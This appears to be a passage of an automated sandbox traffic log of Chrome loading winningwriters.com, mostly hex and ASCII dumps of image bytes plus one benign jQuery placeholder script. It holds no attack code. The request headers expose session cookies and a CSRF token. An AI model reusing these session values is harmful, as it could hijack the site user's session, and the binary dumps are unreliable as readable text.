                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 49 a1 cb 01 e8 74 d6 94 c0 79 ae 6c 73 f6 1c 02 f4 da 0f 8b 00 94 7e ff 00 b7 01 90 f8 7c 26 a7 2c 02 7f d2 62 0f 51 80 09 da 32 35 dd db 80 51 a8 f6 60 02 73 a8 ea 32 f6 e0 30 e8 48 38 02 9a fe 5a e0 0a 8e ec 02 57 00 ba d4 1f b7 d9 80 5a 65 9e 7d de ec 02 0e fe 98 00 8a 0e dc 01 5d 7b 2b 80 3a 0c f2 c0 1d 2b db 80 5c e9 9e 00 d6 ba fd bd 2b 80 41 96 5d b4 c0 03 bf dd ae 00 1a 12 3a f4 c0 1d 32 c0 1a 9d 3d 83 3c 01 43 d0 7b b0 07 bb db 80 3a 9e b4 c0 1d e0 d2 98 05 27 5e cc 02 57 43 d9 d9 80 29 d9 fd 78 04 fb 69 80 3a 6b 80 52 3f af 00 64 7b cf e5 d9 80 4e dc 01 df a7 7e 03 2d 7d bd 06 78 04 ae 7e cd 72 c0 1a e5 f7 7d d8 00 e7 df d9 ef c0 77 8f fc b1 69 5f fb f8 a7 ff 00 ab dc 6c e7 ca 90 d9 0e 0e ea 48 c6 35 c7 75 72 c0 28 cc f6 65 ae 03 21 51 5a e6 00
                                                                                                                                                                                            Data Ascii: Ityls~|&,bQ25Q`s20H8ZWZe}]{+:+\+A]:2=<C{:'^WC)xi:kR?d{N~-}x~r}wi_lH5ur(e!QZ
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 3c 28 ee 5e 68 20 f3 8d 48 65 27 37 40 4e 74 19 28 af 51 ae 03 30 0a c2 80 c6 22 14 52 a1 4d 24 8f 43 b5 aa 7e ec 06 95 c5 c0 89 bf 0a 22 8c e4 ef 07 61 19 e4 73 d6 9a 52 ba 60 34 bc b7 49 54 48 cf 30 51 5f 31 bf 58 76 01 a1 d7 5c 06 37 2c b1 33 b0 90 2b 4a 40 00 28 0b b6 85 74 a5 6a 46 a7 ae 01 a4 54 09 e0 5b 80 14 14 58 cd 43 06 2c 01 19 1a 06 fb 45 3b 70 1a f2 01 1a 33 32 b1 57 22 8c 14 51 19 6a 0d 55 7b 7a d3 00 d9 2c 89 21 22 45 50 cf 50 48 ad 3c 3e de 9d b8 06 79 cd 1e a3 25 07 70 e9 ec 35 ec ee c0 6a c9 29 6a ef 60 8c b5 01 b5 04 56 95 c0 68 48 0a d5 28 36 1c e9 4d 6b 9e 54 f6 60 35 dd 94 d2 a4 65 d3 b4 d3 01 e4 d4 a1 db a8 e9 ec c0 79 d7 42 34 1a 8a e9 80 43 4a 6e a6 01 73 a0 a5 33 d7 01 89 21 45 07 c5 d7 00 bd 0a 9a 57 a0 c0 14 6f c8 9c 02 d3 2a
                                                                                                                                                                                            Data Ascii: <(^h He'7@Nt(Q0"RM$C~"asR`4ITH0Q_1Xv\7,3+J@(tjFT[XC,E;p32W"QjU{z,!"EPPH<>y%p5j)j`VhH(6MkT`5eyB4CJns3!EWo*
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 6b f9 ed c5 9c 76 e8 de 7a 98 c3 4a 55 86 85 40 a5 5b 5a 83 ed c0 53 1e a3 fa 4f 25 fb 7f 11 b8 e2 a1 ba b4 80 ef b6 91 d4 4d 72 80 02 80 a8 2a 7f 54 f4 e9 80 a1 fd 41 fc ba f0 97 dc 61 8f fd 46 53 64 b2 96 61 6f 1c 71 4f 23 b1 2e d2 13 97 c4 1a 8c 09 cf 01 55 c9 f4 6f 81 e1 26 48 6d f8 e1 c3 c6 ec c6 0b 47 f0 db b3 ed 0c 02 f9 62 b1 48 a7 46 1d 75 c0 48 6d fd 1f ca d9 0b 54 bb 89 6e ec d0 19 23 e4 57 2b 88 c9 60 7c b6 20 d1 d1 b5 e8 6b ae 02 e0 fa 6f 2f 2d e9 ae 50 3c b2 34 36 57 8e d0 7c c8 6c bc c9 41 25 1b 4a 28 3f b4 3a 65 d3 01 da 9c 1f a8 1c a4 71 ce 82 64 48 94 b4 b4 db e5 b8 5d ac 69 d4 1e bd 9a e0 2c db 3b 95 4b 59 66 9a 59 a7 82 83 c8 46 90 2c 4b a5 40 51 f0 8a e0 19 ae ef 66 b9 69 d5 e1 77 62 e4 8f 2e 81 1c 30 15 07 75 32 50 29 4f 6e 02 5f 67
                                                                                                                                                                                            Data Ascii: kvzJU@[ZSO%Mr*TAaFSdaoqO#.Uo&HmGbHFuHmTn#W+`| ko/-P<46W|lA%J(?:eqdH]i,;KYfYF,K@Qfiwb.0u2P)On_g
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: c7 33 05 dc 11 83 6a b4 f3 04 44 05 a3 36 45 98 64 4e 74 af 43 80 bc fd 34 f0 cd 0a 32 4f bd bc af 2d fc 45 49 1f b2 c3 f6 87 68 c0 58 6d 6d 6d 3f 1b 3c 36 f0 30 bd 0a cc d7 74 50 08 55 da a0 0a d6 9d 30 1f 3f fe bf 46 27 e4 78 4b 61 1a 7c d5 ac e7 cd 5a 90 55 58 9a 02 b4 a0 d2 a0 9c f2 c0 56 fe 90 e1 bf d6 1e 6b 92 bb e5 1c 45 0f 17 b2 0b 28 82 90 aa ca 4e 6a 2b b4 93 fa a4 fb 70 13 cf 54 70 3e a4 e2 f8 0f 51 43 e8 6f 46 ff 00 ac bc 97 a3 f8 eb 6e 77 d5 7c 93 dd 5b 24 5c 37 11 c8 5e fc 94 5c 95 da cd 32 4b 70 3c dc bc 98 55 9f ad 02 82 70 1c d9 fc f0 7d 15 87 d0 3f ca 7f aa fd 73 ce cd fe b9 fd 41 e7 64 e3 cd ef 36 47 f9 9d b5 95 c3 81 b6 d0 2f c2 68 c1 6b 9e b4 34 cb 01 f0 47 e8 e5 8f d0 8b bf e6 73 e8 bf 11 fc d8 fa 83 94 f4 e7 f2 b1 ca de 4f 6f f5 5f
                                                                                                                                                                                            Data Ascii: 3jD6EdNtC42O-EIhXmmm?<60tPU0?F'xKa|ZUXVkE(Nj+pTp>QCoFnw|[$\7^\2Kp<Up}?sAd6G/hk4GsOo_
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 71 02 26 90 5d 32 c8 e5 e3 0b 40 a4 a6 ef 09 d6 83 40 06 b8 0d 1b 85 ba 31 b2 8d 92 c7 07 80 b3 05 56 01 e8 c7 3a 8a 0a 0e 98 0d 68 56 38 fe 6a 0b 88 9a 47 b8 56 26 e2 39 48 2b d4 ae f5 cc 7b ba e7 80 ca 2b af 32 e0 4b 71 e3 59 8e d7 2c ec 59 49 15 50 54 e4 6a 35 fd 35 c0 49 0a d9 dd 11 6f 3c 21 66 a7 96 db 5c 87 20 d3 35 db 5d 29 5a 1e cc 03 54 bc 61 82 f1 ee 14 8b a8 2d a3 06 68 0d 53 7e ca 80 de f3 42 7b f4 c0 6c 71 b3 20 bb 8a 34 09 07 99 e1 69 a4 6c d4 12 5c 95 0e 00 af 5a 1f 76 02 49 2d 9d 8d e3 5a b5 c2 84 92 dd 14 da cc b5 51 43 ba a5 ab ae d3 d0 6b 80 82 f3 5c 35 da bc f3 f9 66 58 a4 60 26 8d 83 46 24 59 56 be 62 a9 a5 2b e1 f1 76 77 e0 20 7c ca de d9 cf f2 c0 7e 0c 65 37 ec 6a b2 11 fa ad 50 68 17 4d 73 f6 e0 1d b8 79 ee 2d 1a de 48 51 5d 63 1e
                                                                                                                                                                                            Data Ascii: q&]2@@1V:hV8jGV&9H+{+2KqY,YIPTj55Io<!f\ 5])ZTa-hS~B{lq 4il\ZvI-ZQCk\5fX`&F$YVb+vw |~e7jPhMsy-HQ]c
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 3d 7b b0 0d ed eb 25 9d ca 6f 11 2c bb 07 93 25 41 0c c7 6a 81 bb f5 4f ed 0e cc 04 c7 89 b6 9a fa 37 4b c0 63 f0 d2 7d c4 e6 bb a8 0a 86 03 2e d1 80 7b b8 e3 2d e3 b7 48 20 9b 7c 68 8b 1c 4a fe 16 a1 34 19 8d 0e 03 99 be a0 2f 35 e8 9e 5a e3 99 e2 2c 5a 2b 09 62 1e 74 66 b2 2a 37 c2 cf bb 33 b6 bd 7b 70 10 ae 23 f9 90 96 d2 d6 3b 2f e1 77 57 31 a1 9d 1a f1 94 85 0c ab 5c 8d 55 a9 bb 2a 76 e0 1e ac 7e ba 71 5c bd db 91 2a f1 bc cd ba 24 77 56 05 fc b9 94 ca 41 04 07 34 63 d5 88 ae 02 e0 e1 3e bb dc da 5b c5 c7 dd 41 34 8c aa 37 4c 36 a2 b3 16 a5 49 00 9a d0 d7 3c 07 5f fd 25 fa df e9 08 12 54 e6 b8 b6 90 4e bb 56 e4 2a b6 c0 c0 06 62 06 54 da 3e dc 03 bf a9 7e a5 7a 6a e6 f2 3b 8e 22 df c2 9b 80 bc 2b 46 64 2f e0 f0 d6 bb 40 3a 0d 3a e0 39 37 eb 9f d6 db
                                                                                                                                                                                            Data Ascii: ={%o,%AjO7Kc}.{-H |hJ4/5Z,Z+btf*73{p#;/wW1\U*v~q\*$wVA4c>[A47L6I<_%TNV*bT>~zj;"+Fd/@::97
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: b4 77 11 ac 65 df 75 37 57 75 35 d6 87 01 21 ba 91 e7 b4 e2 ee 7c fd f1 dd 59 9b 8b 78 d4 a8 91 67 86 63 1c bb b3 d0 50 54 81 90 24 9c 05 7b cf dc 25 b7 37 04 e6 44 f2 2f bc bb 93 2f 8a 40 7e 63 c0 06 bb 6a 0a 9c 8f bf 00 f4 f7 d6 76 d2 df 6d 99 b6 24 6d e4 5c 08 4a c6 e5 46 dc c0 cb 76 63 dd 4a 69 80 d0 be f4 ec f0 cb 7b 72 6e be 5a ca f2 08 00 8d 98 12 37 01 be b4 a6 47 23 43 53 80 60 9f d3 9e 9c b3 e4 c4 71 71 eb 73 05 a8 73 6b 24 cc f3 bc a1 e1 a4 8e 09 20 9c cd 68 7d b8 06 6b 2f 4f 70 0d b9 38 ce 12 d6 79 ef 01 dd 77 24 48 e1 1c 29 65 3b f3 a7 88 6b 80 73 b3 f4 65 cc cc 92 f2 70 59 a4 d5 26 28 d6 24 23 75 43 6a 02 8d 57 2a 60 24 31 fa 5f 8c b7 75 9a fe f5 64 93 7e 7c 7f cb c0 1e 03 18 02 aa 48 66 db 9d 73 ed c0 3c 3f 1d e9 88 8a 06 49 6f b7 91 f3 71
                                                                                                                                                                                            Data Ascii: weu7Wu5!|YxgcPT${%7D//@~cjvm$m\JFvcJi{rnZ7G#CS`qqssk$ h}k/Op8yw$H)e;ksepY&($#uCjW*`$1_ud~|Hfs<?Ioq
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: b5 39 13 4c 04 96 3e 6b 9b b2 bc b6 83 86 e0 a1 d4 cb 24 f7 65 9e 9e 65 49 ac 63 c3 91 20 67 96 02 e2 e3 ec 3e a4 f3 d1 da db c7 ea 79 38 e8 ae 4a cb 6f 65 c6 c3 04 0d 16 ed bb 98 48 c0 b1 39 78 41 20 0f 7d 30 12 0e 6b d0 2f 27 1d 71 6d c9 f2 dc 9f 31 71 1a 1b 9b 7b b9 ef 2e 19 52 50 7c 4f 46 7a 6d ae 44 e5 9f d9 80 d5 e3 fe 9d 7a 47 e5 12 d8 58 c5 2c 6c 48 a7 8e 59 0b a8 dc 5d 85 4d 77 12 73 39 76 60 37 2c fd 11 e9 eb 39 6e 16 de c9 61 57 29 b6 e3 62 12 3a 54 ed 03 20 49 cb 3a 8c b0 0f f1 70 30 f1 56 6d 34 d1 fe 1c 85 56 27 09 5c c1 da a4 2d 32 53 5c fb 3a e0 36 ac 50 25 dc 87 6d 12 2a 2c 4a 99 f8 97 21 4e da d7 a6 02 ea f4 fd bc 8a 90 86 a0 70 45 09 1e 22 5b 2c bb c1 c0 4f 6d 22 11 57 cd dd 9e 4e a4 75 d4 74 fe dc 06 d3 cb 2c a5 1c 7e 1d 3c 2d 11 c8 a8
                                                                                                                                                                                            Data Ascii: 9L>k$eeIc g>y8JoeH9xA }0k/'qm1q{.RP|OFzmDzGX,lHY]Mws9v`7,9naW)b:T I:p0Vm4V'\-2S\:6P%m*,J!NpE"[,Om"WNut,~<-
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 37 a1 dd 92 69 08 97 29 68 bb 82 0c c6 5a 54 e0 25 5e 41 f2 19 e5 da d7 09 14 92 b5 6b b4 9a 12 87 76 7a 75 18 07 6e 2e ee 75 b0 56 96 11 6c 9c 94 50 89 ad 80 a4 96 e1 ea 4a fe ce e6 03 70 6d 7b 70 1b 2d 76 64 6b 45 f3 db 77 85 d2 15 2c 44 6e f5 75 a1 cb 71 db d7 41 80 9b f1 8a a4 33 6c db 23 b2 30 6c 99 aa 16 9d 4d 02 d0 68 34 c0 48 ad 50 08 58 03 58 f3 d8 a3 c3 4e bf 9f 00 e7 6a b5 35 4a 82 4a 97 03 2a 11 d9 80 97 59 20 50 ac 4d 4b 6b 5f cd 96 01 eb c2 b9 81 47 3e da ff 00 46 00 8d 81 94 33 1c e8 70 1e f9 54 9d d4 ae 03 26 26 83 3a 03 d7 b7 01 89 51 b4 1d 3b f0 19 1a 93 90 cf b7 b3 00 11 53 f0 57 be b8 00 0a 6e 03 23 80 37 53 23 af e5 d9 80 2b 5c d4 d3 f6 bf 23 80 4a d0 d4 b5 6a 30 03 10 7a e0 31 ef 27 db 80 51 5c eb f6 f5 c0 63 97 53 5e cc 02 8e da e7
                                                                                                                                                                                            Data Ascii: 7i)hZT%^Akvzun.uVlPJpm{p-vdkEw,DnuqA3l#0lMh4HPXXNj5JJ*Y PMKk_G>F3pT&&:Q;SWn#7S#+\#Jj0z1'Q\cS^


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            55192.168.2.164977866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC812OUTGET /assets/js/jquery-ck.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:09 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "5d2-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1490
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1490INData Raw: 24 28 22 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 22 29 2e 66 6f 63 75 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 24 28 74 68 69 73 29 3b 69 2e 76 61 6c 28 29 3d 3d 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 26 26 28 69 2e 76 61 6c 28 22 22 29 2c 69 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 29 7d 29 2e 62 6c 75 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 24 28 74 68 69 73 29 3b 28 22 22 3d 3d 69 2e 76 61 6c 28 29 7c 7c 69 2e 76 61 6c 28 29 3d 3d 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 29 26 26 28 69 2e 61 64 64 43 6c 61 73 73 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 29 2c 69 2e 76 61 6c 28 69 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22
                                                                                                                                                                                            Data Ascii: $("[placeholder]").focus(function(){var i=$(this);i.val()==i.attr("placeholder")&&(i.val(""),i.removeClass("placeholder"))}).blur(function(){var i=$(this);(""==i.val()||i.val()==i.attr("placeholder"))&&(i.addClass("placeholder"),i.val(i.attr("placeholder"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            56192.168.2.164978166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC685OUTGET /graphics/tompoetry/burton_slide_show.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:09 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 14 Apr 2024 17:34:26 GMT
                                                                                                                                                                                            ETag: "1bab4-61611ea9cb7dd"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 113332
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 64 62 61 33 64 61 33 62 35 2c 20 32 30 32 33 2f 31 32 2f 31 35 2d 31 30 3a 34 32 3a 33 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 99 94 00 84 a8 1c b1 e5 ee c6 02 59 10 c0 41 06 78 73 e2 4f 08 03 f9 9f 6d 30 07 f3 3e c9 00 4d 50 02 1b c1 32 38 ce 00 23 10 d9 20 f1 73 96 58 c0 0d 0d 32 42 a9 3f b2 c0 04 12 e0 10 e9 09 ec 92 ce 01 39 55 06 12 20 0f 64 04 84 c1 91 d3 20 06 72 80 64 02 7e 52 79 af e6 20 23 80 28 0c e6 24 b2 e0 60 0f e6 7d 92 01 a1 3f 34 f8 7d fc 20 1c 95 04 8e 99 72 1f b6 02 f3 2b ff 00 d3 c6 9f ff 00 dc fa b5 65 ff 00 63 a2 61 8c 6b 85 e1 1a 72 56 57 32 47 e1 8f bc c6 4b 1c 96 4a 30 c4 f0 94 96 00 fc 25 94 e4 87 2c 20 09 af 3c 02 49 66 66 a9 38 03 0e 05 13 b0 fd dc 16 01 a1 29 f6 59 ea 49 e1 28 08 99 91 33 86 5c 51 3d e3 18 06 84 4d 25 3e 1d 84 13 c7 94 01 82 82 33 09 da 3b 8a e3 00 81 fb 67 ed e6 90 0f dd de 10 2a 29 18 0c 0c 00 a8 4a f6 2f 67 09 60 90 02 f0 18 61 f9
                                                                                                                                                                                            Data Ascii: YAxsOm0>MP28# sX2B?9U d rd~Ry #($`}?4} r+ecakrVW2GKJ0%, <Iff8)YI(3\Q=M%>3;g*)J/g`a
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 8e 20 0c 3d 92 ed 80 4b f6 ee 4e 13 45 9c 03 f8 e7 c1 24 92 5c 25 00 b0 1d d8 26 58 c0 48 95 c1 39 15 32 f6 e0 65 01 15 e6 67 fb 42 4f 23 00 c2 65 dd 33 92 cd 00 30 07 05 e7 c1 67 cf 9a e7 00 a6 89 39 15 41 ee e7 00 c7 2c f2 0b 2e dc e4 60 1c b0 9e 24 92 79 89 13 c3 18 03 9e 22 63 bc 82 bd fd d0 01 cb 8a 19 63 8a f3 2a a4 c0 2e 18 4f da 93 08 4e 01 60 0e 28 44 8f b9 71 ec 58 03 b3 d8 73 c2 58 09 85 80 39 e5 9f 2c 24 26 a6 5e c8 01 0c 8f 13 81 24 af 03 2c 50 18 03 14 c4 fd e0 70 e7 00 7d c9 3e 18 f0 43 35 80 3b 33 e5 c7 11 3e 62 00 1e c0 11 7b 7b c6 25 20 1f 71 04 4c 24 d3 bb 1e 10 0b 3c 53 bc aa a1 c4 c8 7e d8 02 59 05 49 e3 c0 1e 22 70 02 9e c3 21 f7 22 60 30 9c 01 84 b8 09 cb b1 70 33 80 07 6e 48 a3 ec 32 c6 00 ee cf 09 f2 09 8c 01 cc 7d c0 7d d2 29 84
                                                                                                                                                                                            Data Ascii: =KNE$\%&XH92egBO#e30g9A,.`$y"cc*.ON`(DqXsX9,$&^$,Pp}>C5;3>b{{% qL$<S~YI"p!"`0p3nH2}})
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 55 fb a0 0c 86 19 9c 94 60 8a 65 9c 01 2f c5 42 49 71 00 71 10 00 28 07 11 35 9c f9 4b 18 00 f3 cf 0e 42 58 2f 6c 00 46 63 3e 28 3b 73 e3 00 95 15 0a f7 2f 29 ae 10 0f 2e 3c 3b e7 20 9e d8 00 77 a0 cf 31 8e 40 f1 80 78 e4 32 c2 6b f8 9f 7c 02 4c 93 30 09 4f 6a 63 01 35 d2 14 4d 4e 27 ec 38 40 46 4e 9b 8a 1c 25 c3 df 00 6a 9a 60 17 11 23 00 f4 84 d4 09 39 cf 97 74 00 09 99 32 2e 01 3d 9e e8 06 02 4c 15 72 4c 28 e4 b0 10 9e a9 c8 92 01 4e e8 09 7e f1 0a 40 1c d3 87 c6 00 50 d5 49 12 88 13 2f ba 00 56 ff 00 1b bd a7 f0 80 0a 66 48 05 11 33 e2 4f 38 00 6a 1f 28 51 91 3f b4 67 00 ca 9c 00 25 3c 5c 94 71 80 02 65 f3 06 a2 76 7e 70 17 a5 0f fa 76 d4 be 2f f3 a7 4e 8c b4 ff 00 81 97 56 38 ac a3 5c 2f 08 d3 92 b2 83 0c 27 39 84 18 22 e4 10 24 64 b2 c6 40 7b d6 68
                                                                                                                                                                                            Data Ascii: U`e/BIqq(5KBX/lFc>(;s/).<; w1@x2k|L0Ojc5MN'8@FN%j`#9t2.=LrL(N~@PI/VfH3O8j(Q?g%<\qev~pv/NV8\/'9"$d@{h
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 5e 0b 9f 62 c0 2e 65 48 5c 78 cd 0f 79 02 00 53 8f e4 0a ca 49 9c 03 ef e5 34 9f 15 32 21 7d b0 0a 58 8f 60 c3 39 fb b0 80 30 5c 47 bb 1f 6e 09 00 4f 98 49 99 9c 70 f6 ac 01 3f 72 a7 b1 72 06 63 dd 00 65 db 3f 74 fb 16 00 0a 9c 96 7c 3b 14 4b 3e d8 03 92 a4 b3 c3 9a 22 a8 80 67 19 c9 06 18 c8 cb 0c 33 80 26 02 e6 80 82 83 8a 4b b8 f7 40 48 c8 4f c5 3e cc a0 22 b2 91 49 fc b8 93 84 d7 18 00 c8 af cd c4 89 72 45 18 40 0a b2 9c f3 53 9f 2c d2 02 42 4a 27 21 c4 ce 59 70 80 15 02 aa ff 00 47 31 df 8c a0 11 43 e2 51 91 4e c1 82 ac 04 9a 57 22 06 2a 49 3f 18 04 80 80 54 2a 09 99 fb 72 80 48 3f 89 be c6 c0 03 07 7e f4 d1 3b 39 40 4c 61 86 9f ba 02 18 66 1d cd 02 37 9e 62 02 47 09 19 a6 23 12 3f 33 01 7a 54 7f a7 4c 3c 5f e7 56 0a 75 27 f8 1b 05 c5 33 8d 71 b4 23
                                                                                                                                                                                            Data Ascii: ^b.eH\xySI42!}X`90\GnOIp?rrce?t|;K>"g3&K@HO>"IrE@S,BJ'!YpG1CQNW"*I?T*rH?~;9@Laf7bG#?3zTL<_Vu'3q#
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 6d 14 03 c4 ad 90 74 06 c1 3d 01 f5 0a 8f a8 5b 03 f6 8d ca ad 33 d4 3b 55 0a 63 75 a6 f2 d0 db 8b 5a 8d f2 ed 37 9a 5a 43 4b 29 bd 05 3b 80 30 55 22 50 17 3b 69 a9 5f a7 77 ca d6 8f 24 54 bb ac d3 4e a3 c6 97 50 ab 4e bb 8d 8d 55 0a 5d 6c 74 9a 44 89 87 84 3f 34 07 b3 f5 c7 a5 6d 7d 47 e8 7a 5b db 68 53 fd 7e cd 44 32 e6 98 57 5c 7e 8a a3 41 b9 7d 12 cd 47 ce b6 a8 d6 d5 6a 48 3e 91 23 38 0d 77 dc 5c ee 1d 3f bb 8d ed 94 4b 6b d0 7b 36 5e a7 b4 a4 ef 2b cf 60 02 ad a6 eb 6e 13 40 6d 5b 66 6b 69 0a 45 51 39 3a 03 3c 7d 3c ea 1b 7e b1 d8 1b 6a ea b6 b5 aa 5a b1 b4 29 b0 69 f2 aa 83 4c 13 6b 76 c2 a4 35 ec 21 1d 30 35 cb 08 0b 89 b3 39 c7 f4 f6 bf cd 6d ee d8 da 87 6d ae ef 1d d1 b1 7d 42 2b 5b d5 71 25 b5 6a d8 d5 f9 b1 05 aa 82 03 a7 d4 fb 0d 0d e9 95 1c
                                                                                                                                                                                            Data Ascii: mt=[3;UcuZ7ZCK);0U"P;i_w$TNPNU]ltD?4m}Gz[hS~D2W\~A}GjH>#8w\?Kk{6^+`n@m[fkiEQ9:<}<~jZ)iLkv5!059mm}B+[q%j
